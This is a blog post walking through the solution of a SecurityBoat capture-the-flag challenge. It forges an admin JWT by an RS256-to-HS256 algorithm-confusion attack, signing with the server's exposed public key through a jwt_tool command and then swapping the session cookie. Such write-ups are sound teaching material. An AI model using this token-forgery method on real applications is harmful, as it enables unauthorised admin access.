DEV Community

Narek Babajanyan
Narek Babajanyan

Posted on

SecurityBoat June CTF solution

SecurityBoat posted the following CTF challenge on their Twitter account.

The challenge was to get to the admin dashboard and retrieve the flag. Initial credentials were provided on the login screen.

Upon logging in, we see two cookies being returned from the server: auth and pubkey.

Server response headers

The auth cookie is clearly a JWT token, so we can use a tool like jwt.io to inspect its contents.

JWT contents

Notably, the token uses RS256 (asymmetric) encryption and specifies a role field within its payload.

Upon logging in, we are redirected to http://ctf.securityboat.in:4000/jwt/user/home.php.

With all that said, our likely attack methodology is the following:

  • Replace the user value with admin within the role field of the token,
  • Find a way to sign the token
  • Using the token, navigate to http://ctf.securityboat.in:4000/jwt/admin/home.php

Since we know the public key used in the RS256 encryption, we can attempt an algorithm confusion attack. This type of attack takes advantage of inexact token handling on the backend, by replacing the alg field in the token header with HS256 and using the exposed public key as an HMAC key. We can use jwt.io for modifying the necessary fields (role and alg) and sign the token with JWT_Tool.

The command to do so looks like the following:

python3 jwt_tool.py INSERT_MODIFIED_TOKEN_HERE -S hs256 -k public_key.pem
Enter fullscreen mode Exit fullscreen mode

..where public_key.pem is the file that contains the RSA public key returned from the server during initial login (make sure to URL-decode the key before saving).

After JWT_Tool returns the tampered token, we can use Chrome to modify the cookies within the current session:

Modifying cookies with Chrome

After navigating to http://ctf.securityboat.in:4000/jwt/admin/user.php, we get the flag.

Victory!

Top comments (0)